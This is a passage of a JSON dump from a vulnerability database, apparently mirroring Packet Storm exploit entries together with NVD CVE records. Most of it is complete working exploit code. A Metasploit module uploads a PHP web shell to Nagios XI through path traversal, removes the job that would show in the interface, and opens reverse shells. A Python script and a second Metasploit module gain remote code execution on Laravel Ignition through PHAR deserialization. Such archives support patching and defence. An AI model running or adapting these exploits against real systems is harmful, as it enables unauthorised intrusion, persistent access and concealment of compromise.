{"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-37343"], "modified": "2022-02-14T00:00:00", "id": "PACKETSTORM:165978", "href": "https://packetstormsecurity.com/files/165978/Nagios-XI-Autodiscovery-Shell-Upload.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::HTTP::NagiosXi \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::FileDropper \nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Nagios XI Autodiscovery Webshell Upload', \n'Description' => %q{ \nThis module exploits a path traversal issue in Nagios XI before version 5.8.5 (CVE-2021-37343). \nThe path traversal allows a remote and authenticated administrator to upload a PHP web shell \nand execute code as `www-data`. The module achieves this by creating an autodiscovery job \nwith an `id` field containing a path traversal to a writable and remotely accessible directory, \nand `custom_ports` field containing the web shell. A cron file will be created using the chosen \npath and file name, and the web shell is embedded in the file. \n \nAfter the web shell has been written to the victim, this module will then use the web shell to \nestablish a Meterpreter session or a reverse shell. By default, the web shell is deleted by \nthe module, and the autodiscovery job is removed as well. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Claroty Team82', # vulnerability discovery \n'jbaines-r7' # metasploit module \n], \n'References' => [ \n['CVE', '2021-37343'], \n['URL', 'https://claroty.com/2021/09/21/blog-research-securing-network-management-systems-nagios-xi/'] \n], \n'DisclosureDate' => '2021-07-15', \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_openssl' \n}, \n'Payload' => { \n'Append' => ' & disown' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'CmdStagerFlavor' => [ 'printf' ], \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DefaultTarget' => 1, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true, \n'MeterpreterTryToFork' => true \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \nregister_options [ \nOptString.new('USERNAME', [true, 'Username to authenticate with', 'nagiosadmin']), \nOptString.new('PASSWORD', [true, 'Password to authenticate with', nil]), \nOptInt.new('DEPTH', [true, 'The depth of the path traversal', 10]), \nOptString.new('WEBSHELL_NAME', [false, 'The name of the uploaded webshell. This value is random if left unset', nil]), \nOptBool.new('DELETE_WEBSHELL', [true, 'Indicates if the webshell should be deleted or not.', true]) \n] \n \n@webshell_uri = '/includes/components/highcharts/exporting-server/temp/' \n@webshell_path = '/usr/local/nagiosxi/html/includes/components/highcharts/exporting-server/temp/' \nend \n \n# Authenticate and grab the version from the dashboard. Store auth cookies for later user. \ndef check \nlogin_result, res_array = nagios_xi_login(datastore['USERNAME'], datastore['PASSWORD'], false) \ncase login_result \nwhen 1..3 # An error occurred \nreturn CheckCode::Unknown(res_array[0]) \nwhen 4 \nreturn CheckCode::Detected('Nagios is not fully installed.') \nwhen 5 \nreturn CheckCode::Detected('The Nagios license has not been signed.') \nend \n \n# res_array[1] cannot be nil since the mixin checks for that already. \n@auth_cookies = res_array[1] \n \nnagios_version = nagios_xi_version(res_array[0]) \nif nagios_version.nil? \nreturn CheckCode::Detected('Unable to obtain the Nagios XI version from the dashboard') \nend \n \n# affected versions are 5.2.0 -> 5.8.4 \nif Rex::Version.new(nagios_version) < Rex::Version.new('5.8.5') && \nRex::Version.new(nagios_version) >= Rex::Version.new('5.2.0') \nreturn CheckCode::Appears(\"Determined using the self-reported version: #{nagios_version}\") \nend \n \nCheckCode::Safe(\"Determined using the self-reported version: #{nagios_version}\") \nend \n \n# Using the path traversal, upload a php webshell to the remote target \ndef drop_webshell \nautodisc_uri = normalize_uri(target_uri.path, '/includes/components/autodiscovery/') \nprint_status(\"Attempting to grab a CSRF token from #{autodisc_uri}\") \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => autodisc_uri, \n'cookie' => @auth_cookies, \n'vars_get' => { \n'mode' => 'newjob' \n} \n}) \n \nfail_with(Failure::Disconnected, 'Connection failed') unless res \nfail_with(Failure::UnexpectedReply, \"Unexpected HTTP status code #{res.code}\") unless res.code == 200 \nfail_with(Failure::UnexpectedReply, 'Unexpected HTTP body') unless res.body.include?('<title>New Auto-Discovery Job') \n \n# snag the nsp token from the response \nnsp = get_nsp(res) \nfail_with(Failure::Unknown, 'Failed to obtain the nsp token which is required to upload the web shell') if nsp.blank? \n \n# drop a basic web shell on the server \nwebshell_location = normalize_uri(target_uri.path, \"#{@webshell_uri}#{@webshell_name}\") \nprint_status(\"Uploading webshell to #{webshell_location}\") \nphp_webshell = '<?php if(isset($_GET[\"cmd\"])) { system($_GET[\"cmd\"]); } ?>' \npayload = 'update=1&' \\ \n\"job=#{'../' * datastore['DEPTH']}#{@webshell_path}#{@webshell_name}&\" \\ \n\"nsp=#{nsp}&\" \\ \n'address=127.0.0.1%2F0&' \\ \n'frequency=Yearly&' \\ \n\"custom_ports=#{php_webshell}&\" \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => autodisc_uri, \n'cookie' => @auth_cookies, \n'vars_get' => { \n'mode' => 'newjob' \n}, \n'data' => payload \n}) \n \nfail_with(Failure::Disconnected, 'Connection failed') unless res \nfail_with(Failure::UnexpectedReply, \"Unexpected HTTP status code #{res.code}\") unless res.code == 302 \n \n# Test the web shell installed by echoing a random string and ensure it appears in the res.body \nprint_status('Testing if web shell installation was successful') \nrand_data = Rex::Text.rand_text_alphanumeric(16..32) \nres = execute_via_webshell(\"echo #{rand_data}\") \nfail_with(Failure::UnexpectedReply, 'Web shell execution did not appear to succeed.') unless res.body.include?(rand_data) \nprint_good(\"Web shell installed at #{webshell_location}\") \n \n# This is a great place to leave a web shell for persistence since it doesn't require auth \n# to touch it. By default, we'll clean this up but the attacker has to option to leave it \nif datastore['DELETE_WEBSHELL'] \nregister_file_for_cleanup(\"#{@webshell_path}#{@webshell_name}\") \nend \nend \n \n# Successful exploitation creates a new job in the autodiscovery view. This function deletes \n# the job that there is no evidence of exploitation in the UI. \ndef cleanup_job \nprint_status('Deleting autodiscovery job') \n \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/includes/components/autodiscovery/'), \n'cookie' => @auth_cookies, \n'vars_get' => { \n'mode' => 'deletejob', \n'job' => \"#{'../' * datastore['DEPTH']}#{@webshell_path}#{@webshell_name}\" \n} \n}) \n \nfail_with(Failure::Disconnected, 'Connection failed') unless res \nfail_with(Failure::UnexpectedReply, \"Unexpected HTTP status code #{res.code}\") unless res&.code == 302 \nend \n \n# Executes commands via the uploaded webshell \ndef execute_via_webshell(cmd) \ncmd = Rex::Text.uri_encode(cmd) \nres = send_request_cgi({ \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, \"/includes/components/highcharts/exporting-server/temp/#{@webshell_name}?cmd=#{cmd}\") \n}) \n \nfail_with(Failure::Disconnected, 'Connection failed') unless res \nfail_with(Failure::UnexpectedReply, \"Unexpected HTTP status code #{res.code}\") unless res.code == 200 \nres \nend \n \ndef execute_command(cmd, _opts = {}) \nexecute_via_webshell(cmd) \nend \n \ndef exploit \n# create a randomish web shell name if the user doesn't specify one \n@webshell_name = datastore['WEBSHELL_NAME'] || \"#{Rex::Text.rand_text_alpha(5..12)}.php\" \n \ndrop_webshell \n \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \nensure \ncleanup_job \nend \nend \n`\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/165978/nagios_xi_autodiscovery_webshell.rb.txt"}, {"lastseen": "2021-04-06T14:45:06", "description": "", "cvss3": {}, "published": "2021-04-06T00:00:00", "type": "packetstorm", "title": "Ignition 2.5.1 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-3129"], "modified": "2021-04-06T00:00:00", "id": "PACKETSTORM:162094", "href": "https://packetstormsecurity.com/files/162094/Ignition-2.5.1-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Laravel debug mode Remote Code Execution (Ignition <= 2.5.1) \n# Date: 05/04/2021 \n# Exploit Author: Tobias Marcotto \n# Tested on: Kali Linux x64 \n# Version: < 2.5.1 \n# Description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2. \n# CVE : CVE-2021-3129 \n \n \n********************************************************************************************************* \n \n \n#!/usr/bin/env python3.7 \n \nimport base64 \nimport re \nimport sys \nfrom dataclasses import dataclass \n \nimport requests \n \n \n@dataclass \nclass Exploit: \nsession: requests.Session \nurl: str \npayload: bytes \nlog_path: str \n \ndef main(self): \nif not self.log_path: \nself.log_path = self.get_log_path() \n \ntry: \nself.clear_logs() \nself.put_payload() \nself.convert_to_phar() \nself.run_phar() \nfinally: \nself.clear_logs() \n \ndef success(self, message, *args): \nprint('+ ' + message.format(*args)) \n \ndef failure(self, message, *args): \nprint('- ' + message.format(*args)) \nexit() \n \ndef get_log_path(self): \nr = self.run_wrapper('DOESNOTEXIST') \nmatch = re.search(r'\"file\":\"(\\\\/[^\"]+?)\\\\/vendor\\\\/[^\"]+?\"', r.text) \nif not match: \nself.failure('Unable to find full path') \npath = match.group(1).replace('\\\\/', '/') \npath = f'{path}/storage/logs/laravel.log' \nr = self.run_wrapper(path) \nif r.status_code != 200: \nself.failure('Log file does not exist: {}', path) \n \nself.success('Log file: {}', path) \nreturn path \n \ndef clear_logs(self): \nwrapper = f'php://filter/read=consumed/resource={self.log_path}' \nself.run_wrapper(wrapper) \nself.success('Logs cleared') \nreturn True \n \ndef get_write_filter(self): \nfilters = '|'.join(( \n'convert.quoted-printable-decode', \n'convert.iconv.utf-16le.utf-8', \n'convert.base64-decode' \n)) \nreturn f'php://filter/write={filters}/resource={self.log_path}' \n \ndef run_wrapper(self, wrapper): \nsolution = \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\" \nreturn self.session.post( \nself.url + '/_ignition/execute-solution/', \njson={ \n\"solution\": solution, \n\"parameters\": { \n\"viewFile\": wrapper, \n\"variableName\": \"doesnotexist\" \n} \n} \n) \n \ndef put_payload(self): \npayload = self.generate_payload() \n# This garanties the total log size is even \nself.run_wrapper(payload) \nself.run_wrapper('AA') \n \ndef generate_payload(self): \npayload = self.payload \npayload = base64.b64encode(payload).decode().rstrip('=') \npayload = ''.join(c + '=00' for c in payload) \n# The payload gets displayed twice: use an additional '=00' so that \n# the second one does not have the same word alignment \nreturn 'A' * 100 + payload + '=00' \n \ndef convert_to_phar(self): \nwrapper = self.get_write_filter() \nr = self.run_wrapper(wrapper) \nif r.status_code == 200: \nself.success('Successfully converted to PHAR !') \nelse: \nself.failure('Convertion to PHAR failed (try again ?)') \n \ndef run_phar(self): \nwrapper = f'phar://{self.log_path}/test.txt' \nr = self.run_wrapper(wrapper) \nif r.status_code != 500: \nself.failure('Deserialisation failed ?!!') \nself.success('Phar deserialized') \n# We might be able to read the output of system, but if we can't, it's ok \nmatch = re.search('^(.*?)\\n<!doctype html>\\n<html class=\"', r.text, flags=re.S) \n \nif match: \nprint('--------------------------') \nprint(match.group(1)) \nprint('--------------------------') \nelif 'phar error: write operations' in r.text: \nprint('Exploit succeeded') \nelse: \nprint('Done') \n \n \ndef main(url, payload, log_path=None): \npayload = open(payload, 'rb').read() \nsession = requests.Session() \n#session.proxies = {'http': 'localhost:8080'} \nexploit = Exploit(session, url.rstrip('/'), payload, log_path) \nexploit.main() \n \n \nif len(sys.argv) <= 1: \nprint( \nf'Usage: {sys.argv[0]} <url> </path/to/exploit.phar> [log_file_path]\\n' \n'\\n' \n'Generate your PHAR using PHPGGC, and add the --fast-destruct flag if ' \n'you want to see your command\\'s result. The Monolog/RCE1 GC works fine.\\n\\n' \n'Example:\\n' \n' $ php -d\\'phar.readonly=0\\' ./phpggc --phar phar -f -o /tmp/exploit.phar monolog/rce1 system id\\n' \n' $ ./laravel-ignition-rce.py http://127.0.0.1:8000/ /tmp/exploit.phar\\n' \n) \nexit() \n \nmain(sys.argv[1], sys.argv[2], (len(sys.argv) > 3 and sys.argv[3] or None)) \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/162094/ignition251-exec.txt"}, {"lastseen": "2022-02-16T17:22:18", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-16T00:00:00", "type": "packetstorm", "title": "Ignition Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-02-16T00:00:00", "id": "PACKETSTORM:165999", "href": "https://packetstormsecurity.com/files/165999/Ignition-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \nprepend Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Unauthenticated remote code execution in Ignition', \n'Description' => %q{ \nIgnition before 2.5.2, as used in Laravel and other products, \nallows unauthenticated remote attackers to execute arbitrary code \nbecause of insecure usage of file_get_contents() and file_put_contents(). \nThis is exploitable on sites using debug mode with Laravel before 8.4.2. \n}, \n'Author' => [ \n'Heyder Andrade <eu[at]heyderandrade.org>', # module development and debugging \n'ambionics' # discovered \n], \n'License' => MSF_LICENSE, \n'References' => [ \n['CVE', '2021-3129'], \n['URL', 'https://www.ambionics.io/blog/laravel-debug-rce'] \n], \n'DisclosureDate' => '2021-01-13', \n'Platform' => %w[unix linux macos win], \n'Targets' => [ \n[ \n'Unix (In-Memory)', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_memory, \n'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } \n} \n], \n[ \n'Windows (In-Memory)', \n{ \n'Platform' => 'win', \n'Arch' => ARCH_CMD, \n'Type' => :win_memory, \n'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/reverse_powershell' } \n} \n] \n], \n'Privileged' => false, \n'DefaultTarget' => 0, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS] \n} \n) \n) \nregister_options([ \nOptString.new('TARGETURI', [true, 'Ignition execute solution path', '/_ignition/execute-solution']), \nOptString.new('LOGFILE', [false, 'Laravel log file absolute path']) \n]) \nend \n \ndef check \nprint_status(\"Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}\") \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path.to_s), \n'method' => 'PUT' \n}, 1) \n# Check whether it is using facade/ignition \n# If is using it should respond method not allowed \n# checking if debug mode is enable \nif res && res.code == 405 && res.body.match(/label:\"(Debug)\"/) \nvprint_status 'Debug mode is enabled.' \n# check version \nversions = JSON.parse( \nres.body.match(/.+\"report\":(\\{.*),\"exception_class/).captures.first.gsub(/$/, '}') \n) \nversion = Rex::Version.new(versions['framework_version']) \nvprint_status \"Found PHP #{versions['language_version']} running Laravel #{version}\" \n# to be sure that it is vulnerable we could try to cleanup the log files (invalid and valid) \n# but it is way more intrusive than just checking the version moreover we would need to call \n# the find_log_file method before, meaning four requests more. \nreturn Exploit::CheckCode::Appears if version <= Rex::Version.new('8.26.1') \nend \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \n@logfile = datastore['LOGFILE'] || find_log_file \nfail_with(Failure::BadConfig, 'Log file is required, however it was neither defined nor automatically detected.') unless @logfile \n \nclear_log \nput_payload \nconvert_to_phar \nrun_phar \n \nhandler \n \nclear_log \nend \n \ndef find_log_file \nvprint_status 'Trying to detect log file' \nres = post Rex::Text.rand_text_alpha_upper(12) \nif res.code == 500 && res.body.match(%r{\"file\":\"(\\\\/[^\"]+?)/vendor\\\\/[^\"]+?}) \nlogpath = Regexp.last_match(1).gsub(/\\\\/, '') \nvprint_status \"Found directory candidate #{logpath}\" \nlogfile = \"#{logpath}/storage/logs/laravel.log\" \nvprint_status \"Checking if #{logfile} exists\" \nres = post logfile \nif res.code == 200 \nvprint_status \"Found log file #{logfile}\" \nreturn logfile \nend \nvprint_error \"Log file does not exist #{logfile}\" \nreturn \nend \nvprint_error 'Unable to automatically find the log file. To continue set LOGFILE manually' \nreturn \nend \n \ndef clear_log \nres = post \"php://filter/read=consumed/resource=#{@logfile}\" \n# guard clause when trying to exploit a target that is not vulnerable (set ForceExploit true) \nfail_with(Failure::UnexpectedReply, \"Log file #{@logfile} doesn't seem to exist.\") unless res.code == 200 \nend \n \ndef put_payload \npost format_payload \npost Rex::Text.rand_text_alpha_upper(2) \nend \n \ndef convert_to_phar \nfilters = %w[ \nconvert.quoted-printable-decode \nconvert.iconv.utf-16le.utf-8 \nconvert.base64-decode \n].join('|') \n \npost \"php://filter/write=#{filters}/resource=#{@logfile}\" \nend \n \ndef run_phar \npost \"phar://#{@logfile}/#{Rex::Text.rand_text_alpha_lower(4..6)}.txt\" \n# resp.body.match(%r{^(.*)\\n<!doctype html>}) \n# $1 ? print_good($1) : nil \nend \n \ndef body_template(data) \n{ \nsolution: 'Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution', \nparameters: { \nviewFile: data, \nvariableName: Rex::Text.rand_text_alpha_lower(4..12) \n} \n}.to_json \nend \n \ndef post(data) \nsend_request_cgi({ \n'uri' => normalize_uri(target_uri.path.to_s), \n'method' => 'POST', \n'data' => body_template(data), \n'ctype' => 'application/json', \n'headers' => { \n'Accept' => '*/*', \n'Accept-Encoding' => 'gzip, deflate' \n} \n}) \nend \n \ndef generate_phar(pop) \nfile = Rex::Text.rand_text_alpha_lower(8) \nstub = \"<?php __HALT_COMPILER(); ?>\\r\\n\" \nfile_contents = Rex::Text.rand_text_alpha_lower(20) \nfile_crc32 = Zlib.crc32(file_contents) & 0xffffffff \nmanifest_len = 40 + pop.length + file.length \nphar = stub \nphar << [manifest_len].pack('V') # length of manifest in bytes \nphar << [0x1].pack('V') # number of files in the phar \nphar << [0x11].pack('v') # api version of the phar manifest \nphar << [0x10000].pack('V') # global phar bitmapped flags \nphar << [0x0].pack('V') # length of phar alias \nphar << [pop.length].pack('V') # length of phar metadata \nphar << pop # pop chain \nphar << [file.length].pack('V') # length of filename in the archive \nphar << file # filename \nphar << [file_contents.length].pack('V') # length of the uncompressed file contents \nphar << [0x0].pack('V') # unix timestamp of file set to Jan 01 1970. \nphar << [file_contents.length].pack('V') # length of the compressed file contents \nphar << [file_crc32].pack('V') # crc32 checksum of un-compressed file contents \nphar << [0x1b6].pack('V') # bit-mapped file-specific flags \nphar << [0x0].pack('V') # serialized File Meta-data length \nphar << file_contents # serialized File Meta-data \nphar << [Rex::Text.sha1(phar)].pack('H*') # signature \nphar << [0x2].pack('V') # signiture type \nphar << 'GBMB' # signature presence \n \nreturn phar \nend \n \ndef format_payload \n# rubocop:disable Style/StringLiterals \nserialize = \"a:2:{i:7;O:31:\\\"GuzzleHttp\\\\Cookie\\\\FileCookieJar\\\"\" \nserialize << \":1:{S:41:\\\"\\\\00GuzzleHttp\\\\5cCookie\\\\5cFileCookieJar\\\\00filename\\\";\" \nserialize << \"O:38:\\\"Illuminate\\\\Validation\\\\Rules\\\\RequiredIf\\\"\" \nserialize << \":1:{S:9:\\\"condition\\\";a:2:{i:0;O:20:\\\"PhpOption\\\\LazyOption\\\"\" \nserialize << \":2:{S:30:\\\"\\\\00PhpOption\\\\5cLazyOption\\\\00callback\\\";\" \nserialize << \"S:6:\\\"system\\\";S:31:\\\"\\\\00PhpOption\\\\5cLazyOption\\\\00arguments\\\";\" \nserialize << \"a:1:{i:0;S:#{payload.encoded.length}:\\\"#{payload.encoded}\\\";}}i:1;S:3:\\\"get\\\";}}}i:7;i:7;}\" \n# rubocop:enable Style/StringLiterals \nphar = generate_phar(serialize) \n \nb64_gadget = Base64.strict_encode64(phar).gsub('=', '') \npayload_data = b64_gadget.each_char.collect { |c| c + '=00' }.join \n \nreturn Rex::Text.rand_text_alpha_upper(100) + payload_data + '=00' \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/165999/ignition_laravel_debug_rce.rb.txt"}], "cve": [{"lastseen": "2023-06-06T14:56:24", "description": "The Grandstream UCM6200 series before 1.0.20.22 is vulnerable to an SQL injection via the HTTP server's websockify endpoint. A remote unauthenticated attacker can invoke the challenge action with a crafted username and discover user passwords.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-03-30T20:15:00", "type": "cve", "title": "CVE-2020-5724", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5724"], "modified": "2020-03-30T21:49:00", "cpe": [], "id": "CVE-2020-5724", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-5724", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2023-05-23T15:36:31", "description": "A path traversal vulnerability exists in Nagios XI below version 5.8.5 AutoDiscovery component and could lead to post authenticated RCE under security context of the user running Nagios.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-13T12:15:00", "type": "cve", "title": "CVE-2021-37343", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-37343"], "modified": "2022-02-22T14:30:00", "cpe": [], "id": "CVE-2021-37343", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-37343", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-06-06T14:56:23", "description": "The UCM6200 series 1.0.20.22 and below stores unencrypted user passwords in an SQLite database. This could allow an attacker to retrieve all passwords and possibly gain elevated privileges.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-30T20:15:00", "type": "cve", "title": "CVE-2020-5723", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5723"], "modified": "2020-04-01T14:58:00", "cpe": [], "id": "CVE-2020-5723", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-5723", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2023-05-27T14:42:18", "description": "Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-12T15:15:00", "type": "cve", "title": "CVE-2021-3129", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3129"], "modified": "2022-02-22T10:15:00", "cpe": [], "id": "CVE-2021-3129", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3129", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "prion": [{"lastseen": "2023-08-16T06:36:42", "description": "A path traversal vulnerability exists in Nagios XI below version 5.8.5 AutoDiscovery component and could lead to post authenticated RCE under security context of the user running Nagios.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, 